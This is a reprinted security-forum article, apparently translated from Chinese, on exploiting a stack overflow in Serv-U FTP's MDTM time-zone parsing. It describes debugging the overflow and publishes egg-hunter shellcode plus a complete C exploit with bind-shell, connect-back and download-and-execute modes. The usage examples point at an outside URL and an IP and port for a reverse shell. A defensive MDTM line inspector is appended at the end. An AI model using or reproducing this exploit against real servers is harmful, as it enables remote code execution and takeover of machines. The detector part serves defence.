Serv-U MDTM TIME ZONE EXPLOIT
Create time: 2004-02-27
Article properties: reprint
Article submission: Velvet (ZodiacSoft_AT_HOTMAIL.COM)
Forum login name: Swan
Submit email address: ????
Submit QQ number: ????
Copyright: the article belongs jointly to China Safety Net (http://www.safechina.net) and the author; please indicate the source when reprinting!
Title: Serv-U MDTM Time Zone Exploit
I tested with Serv-U 5.0. First I built a very long time zone and found that nothing happened; after shortening the time zone it seemed that the overflow could not be triggered if the first space came too late. My guess is that the command is truncated at some length: if the first space appears too far in, Serv-U simply treats the command as a query for the modification date of a long file name, and the overflow is not triggered.
So I went back and built an exploit skeleton around a string that could be triggered. After finding the RET point by the usual method, I attached OllyDbg to the Serv-U daemon to watch what happened during exception handling. The result matched my expectation: I single-stepped through the CALL EBX, then the NOP NOP JMP 4, to where the shellcode should be by the usual method, and carefully compared the bytes at the current EIP with the string I had sent. Only the first 294 bytes matched; without doubt the sent data was truncated.
My first reaction was to look for a tiny shellcode, but unfortunately I really could not find one. I dug out eyas's WS_FTP article, which looked very similar, but that case had 512 free bytes; 294 bytes seemed too few however I looked at it. By then it was about eleven o'clock and I decided to sleep on it first; I had spent the whole day watching anime and my head was full of the grim face of Scar (SCAR?), so there was no way to concentrate.
The next day I decided to try to locate the original buffer in memory. This time I appended SWAN as a tag after a long MDTM command; when the overflow triggered I searched for it and found the original data near EDI, apparently in several copies. At that point the registers EBX / ESI / EDI / EBP / ESP were all close to 11xxxxx. Searching from these, the raw, unprocessed data should be findable, and I thought the exploit could be finished right away.
My idea was to use a tag such as a trailing "SWAN" to confirm that the buffer is intact, then search backwards from it and finally jump there. To make sure the overflow triggers reliably, I put the search code in the time zone and the real shellcode in the file name. In other words, the shellcode here must be a valid file name; that problem was already solved for the SITE CHMOD exploit, whose shellcode can be used directly.
The search code needs some thought. Done properly it should locate its own position dynamically, take over exception handling, and use a checksum to confirm that the original buffer is complete. But the more you add, the more problems you get, and I am a lazy person; I did not want to kill myself over it, so I just muddled through. For generality the RET address is not the CALL EBX at 0x7ffa4a1b (that one does not exist on XP) but the POP / POP / RET address 0x7FFA1571 that Lion gave in the SITE CHMOD exploit. It is said to work even on Win2K3; I have no machine to test that, and only checked the English version of XP and the Chinese version of 2K, where it does work. With this, however, EDI changes, and on XP EBX is 0x00000000 after exception handling, so I start the search from ESP instead, which finds the buffer on both Win2K and WinXP. Enough talk; follow the code and you will see. The search code is this:
    // "\xcc"                  // int3; for test :-))
    "\x8b\xdc"                 // mov ebx, esp; "pop ebx" is also OK
    "\xb8\x52\x57\x41\x4e"     // mov eax, 4e415752h ("RWAN", so the tag itself never appears in the search code)
    "\x40"                     // inc eax; eax = 4e415753h = "SWAN" now
    "\x43"                     // inc ebx
    "\x39\x03"                 // cmp [ebx], eax
    "\x75\xfb"                 // jne -5; search forward for "SWAN"
    "\xb8\x90\x90\x90\x90"     // mov eax, 90909090h
    // "\xcc"                  // int3; for test
    "\x4b"                     // dec ebx
    "\x39\x03"                 // cmp [ebx], eax
    "\x75\xfb"                 // jne -5; search backwards for NOP NOP NOP NOP
    "\xff\xd3"                 // call ebx
    "\x20\x20";                //
Roughly: find SWAN, then search backwards for the four NOPs to get the address of the complete shellcode, and jump there to execute it. The meaning of the two trailing spaces (0x20) I have already explained ~
The complete exploit follows. No write permission is needed; being able to log in is enough. I have not tested on many machines (three plus a virtual machine), so I don't know whether other unexpected problems will turn up; after all this was pure black-box guesswork, and I did not look at a single line of disassembly. One more thing: the method is simple on Serv-U 5.0, but it also works on versions from 3.x onward; if you don't like the RET address, change it yourself. This is valid for the Chinese versions of 2K / XP / 2K3.
/*
 Serv-U only takes an MDTM command of less than 294 bytes, which is too short to exploit.
 However, we can send an MDTM command as long as we wish, and we can easily find our
 raw buffer in memory. To be brief, you can find it near [edi] when the overflow
 happens. So search from edi, and you can exploit it.
 My way to exploit this can be described as follows:
  ------ ---------------------- ---------
 | MDTM | long buffer with ' ' | buffer1 |
  ------ ---------------------- ---------
 buffer1:
  --------------- -------------------- -------------------
 | NOP NOP JMP 4 | addr of "call ebx" | short search code |
  --------------- -------------------- -------------------
 buffer2: (as the filename)
  ----------------- ---------------- -------------
 | flag 0x90909090 | real shellcode | flag 'swan' |
  ----------------- ---------------- -------------
 The real shellcode must be a valid filename; see the "Site Chmod exploit" for
 more information about how to make the shellcode valid.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
void help(char *program)
{
    printf("========================================================\r\n");
    printf("Serv-U MDTM Time Zone Stack Overflow Xploit V0.20 alpha\r\n");
    printf("For Serv-U 5.0 and below, written by Swan@SEU\r\n");
    printf("=========================================================\r\n\r\n");
    printf("Usage: %s <host> <port> <user> <pass>\r\n", program);
    printf("       %s <host> <port> <user> <pass> <url>\r\n", program);
    printf("       %s <host> <port> <user> <pass> <ip> <port>\r\n", program);
    printf("e.g.:\r\n");
    printf("%s 127.0.0.1 21 test test\r\n", program);
    printf("%s 127.0.0.1 21 test test http://hack.co.za/swan.exe\r\n", program);
    printf("%s 127.0.0.1 21 test test 202.119.9.42 8111\r\n", program);
    return;
}
unsigned char bpsc[] =
    // shellcode flag, necessary! (the search code looks backwards for it)
    "\x90\x90\x90\x90"
    // xor-0x99 decoder (assumes EBX is near the encoded shellcode) followed by the
    // encoded bind-port shellcode; the port is stored xor 0x9999, default is 8111
    /* ... */;
#define ip_offset 253
#define port_offset 248
unsigned char cbsc[] =
    "\x90\x90\x90\x90"
    // xor-0x99 decoder and encoded connect-back shellcode, from
    // http://www.xfocus.net/articles/200307/574.html (ip at ip_offset, port at port_offset, xor-0x99 encoded)
    /* ... */;
unsigned char dehead[] =
    "\x90\x90\x90\x90"
    // xor-0x99 decoder and encoded download & execute shellcode, modified slightly...
    /* ... */;
    // "http://127.0.0.1/hello.exe"
    // "\x80";
unsigned char desc[500] = {0};
void main(int argc, char *argv[])
{
    WSADATA wsadata;
    SOCKET s;
    struct hostent *he;
    struct sockaddr_in host;
    int ntimeout = 1000;

    if (argc != 5 && argc != 6 && argc != 7) {
        help(argv[0]);
        return;
    }
    if (argc == 6) {
        // initialize the download & execute shellcode:
        // shellcode head + ((url + 0x80) xor 0x99)   <== all for the damned ':'
        memset(desc, 0, 500);
        memcpy(desc, dehead, sizeof(dehead));
        char url[255];
        strcpy(url, argv[5]);
        strcat((char *)url, "\x80");
        for (unsigned int j = 0; j < strlen(url); j++)
            url[j] = url[j] ^ '\x99';
        strcat((char *)desc, url);
    }
    if (argc == 7) {
        unsigned short port = htons(atoi(argv[6])) ^ (u_short)0x9999;
        unsigned long ip = inet_addr(argv[5]) ^ 0x99999999;
        memcpy(&cbsc[port_offset], &port, 2);
        memcpy(&cbsc[ip_offset], &ip, 4);
    }
    if (WSAStartup(0x0101, &wsadata) != 0) {
        printf("Error starting Winsock..");
        return;
    }
    if ((he = gethostbyname(argv[1])) == 0) {
        printf("Failed resolving '%s'", argv[1]);
        return;
    }
    host.sin_port = htons(atoi(argv[2]));
    host.sin_family = AF_INET;
    host.sin_addr = *(struct in_addr *)he->h_addr;
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        printf("Failed creating socket");
        return;
    }
    if (connect(s, (struct sockaddr *)&host, sizeof(host)) == -1) {
        printf("Failed connecting to host\r\n");
        return;
    }
    setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, (char *)&ntimeout, sizeof(ntimeout));
    char buff[50000] = {0};
    memset(buff, 0, sizeof(buff));
    char szuser[255] = {0};
    strcpy(szuser, "USER ");
    strcat(szuser, argv[3]);
    strcat(szuser, "\r\n");
    char szpass[255] = {0};
    strcpy(szpass, "PASS ");
    strcat(szpass, argv[4]);
    strcat(szpass, "\r\n");
    int bread = recv(s, buff, sizeof(buff), 0);
    if (bread == -1) {
        closesocket(s);
        printf("No response... perhaps it has been hacked!\r\n");
        return;
    }
    printf(buff);
    // send USER
    send(s, szuser, strlen(szuser), 0);
    memset(buff, 0, sizeof(buff));
    recv(s, buff, sizeof(buff), 0);
    printf(buff);
    // send PASS
    send(s, szpass, strlen(szpass), 0);
    memset(buff, 0, sizeof(buff));
    recv(s, buff, sizeof(buff), 0);
    printf(buff);
    if (buff[0] == '5') {
        closesocket(s);
        printf("Authentication failed!\r\n");
        return;
    }
    char xploit[1500] = {0};
    char head[] = "MDTM 19811102172800 IN_MY_DREAM_I_ALWAYS_SEE_YOU_SOAR_ABOVE_THE_SKY";
    /*************************************************************************
     * Search the "SWAN" to ensure the buffer is intact, then search backwards
     * to find the head of the shellcode.
     *************************************************************************/
    char search[] =
        // "\xcc"                  // int3 (for test)
        "\x8b\xdc"                 // mov ebx, esp
        "\xb8\x52\x57\x41\x4e"     // mov eax, 4e415752h ("RWAN")
        "\x40"                     // inc eax; eax = "SWAN" now
        "\x43"                     // inc ebx
        "\x39\x03"                 // cmp [ebx], eax
        "\x75\xfb"                 // jne -5
        "\xb8\x90\x90\x90\x90"     // mov eax, 90909090h
        // "\xcc"                  // int3 (for test)
        "\x4b"                     // dec ebx
        "\x39\x03"                 // cmp [ebx], eax
        "\x75\xfb"                 // jne -5
        "\xff\xd3"                 // call ebx
        "\x20\x20";                //
    memset(xploit, 0, sizeof(xploit));
    strcpy(xploit, head);
    *(int *)(xploit + strlen(head) + 0) = 0x04eb9090;   // NOP NOP JMP 4
    *(int *)(xploit + strlen(head) + 4) = 0x7ffa1571;   // pop/pop/ret; 0x7ffa4a1b (call ebx) is Win2K only
    // copy the search code
    memcpy(xploit + strlen(head) + 8, search, sizeof(search));
    // copy the shellcode
    if (argc == 5)
        memcpy(xploit + strlen(head) + 8 + strlen(search), bpsc, sizeof(bpsc));
    if (argc == 6)
        memcpy(xploit + strlen(head) + 8 + strlen(search), desc, strlen((char *)desc));
    if (argc == 7)
        memcpy(xploit + strlen(head) + 8 + strlen(search), cbsc, sizeof(cbsc));
    // copy the flag. Swan? it's me ~
    strcat(xploit, "SWAN\r\n");
    //printf(xploit);
    send(s, xploit, strlen(xploit), 0);
    memset(buff, 0, sizeof(buff));
    bread = recv(s, buff, sizeof(buff), 0);
    if (bread == -1) {
        closesocket(s);
        if (argc == 5)
            printf("Success! Try connecting to port 8111 to get your ...\r\n");
        if (argc == 6)
            printf("Success! Host has downloaded and executed the program...\r\n");
        if (argc == 7)
            printf("Success! See your nc.exe...\r\n");
        return;
    }
    printf("Failed... perhaps it has been patched!\r\n");
    closesocket(s);
    return;
}
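As an added, defender-side example that is not part of the original article or of Serv-U: a C inspector for FTP control-channel lines that flags the MDTM shapes this exploit depends on, namely non-printable bytes in the argument (NOP sled, search code, shellcode), a command reaching the 294-byte copy limit the article found, and a time-zone token that is not a short [+-]digits suffix. The 294-byte figure and the command layout come from the article; the verdict names, the "+HHMM" zone assumption and the sample lines are constructed for this example.

```c
#include <stddef.h>
#include <string.h>
/* Verdict for one FTP control-channel line (constructed example, not Serv-U code). */
enum mdtm_verdict {
    MDTM_NOT_MDTM = 0,  /* some other verb */
    MDTM_OK,            /* "MDTM path" or "MDTM YYYYMMDDHHMMSS[+-HHMM] path" */
    MDTM_BINARY,        /* bytes outside printable ASCII: NOP sled, search code, shellcode */
    MDTM_OVERSIZED,     /* command reaches the 294-byte copy limit the article found */
    MDTM_BAD_TIMEZONE   /* time-zone token overlong or not [+-] followed by digits */
};
#define MDTM_COPY_LIMIT 294  /* from the article: only the first 294 bytes are kept */
#define MDTM_TZ_MAX     5    /* assumption: a sane zone is at most "+HHMM" / "-HHMM" */
static int is_digit(unsigned char c) { return c >= '0' && c <= '9'; }

enum mdtm_verdict inspect_mdtm(const unsigned char *line, size_t len)
{
    size_t i, tz_len;
    while (len > 0 && (line[len - 1] == '\r' || line[len - 1] == '\n'))
        len--;                                   /* CRLF is not part of the command */
    if (len < 5)
        return MDTM_NOT_MDTM;
    for (i = 0; i < 5; i++) {                    /* FTP verbs are case-insensitive */
        unsigned char c = line[i];
        if (c >= 'a' && c <= 'z') c -= 'a' - 'A';
        if (c != (unsigned char)"MDTM "[i])
            return MDTM_NOT_MDTM;
    }
    for (i = 5; i < len; i++)                    /* no real client puts code in a path */
        if (line[i] < 0x20 || line[i] > 0x7e)
            return MDTM_BINARY;
    if (len >= MDTM_COPY_LIMIT)
        return MDTM_OVERSIZED;
    if (len < 19)                                /* too short for a 14-digit timestamp */
        return MDTM_OK;
    for (i = 5; i < 19; i++)                     /* query form "MDTM path": done */
        if (!is_digit(line[i]))
            return MDTM_OK;
    for (tz_len = 0; 19 + tz_len < len && line[19 + tz_len] != ' '; tz_len++)
        ;                                        /* zone token runs to the next space */
    if (tz_len == 0)
        return MDTM_OK;
    if (tz_len > MDTM_TZ_MAX || (line[19] != '+' && line[19] != '-'))
        return MDTM_BAD_TIMEZONE;
    for (i = 1; i < tz_len; i++)
        if (!is_digit(line[19 + i]))
            return MDTM_BAD_TIMEZONE;
    return MDTM_OK;
}

/* Wrapper for NUL-terminated sample lines. */
enum mdtm_verdict inspect_mdtm_str(const char *line)
{
    return inspect_mdtm((const unsigned char *)line, strlen(line));
}
```

A real client never has a reason to send a zone longer than a few characters or any byte outside printable ASCII in an MDTM argument, so either verdict is a strong signal on its own.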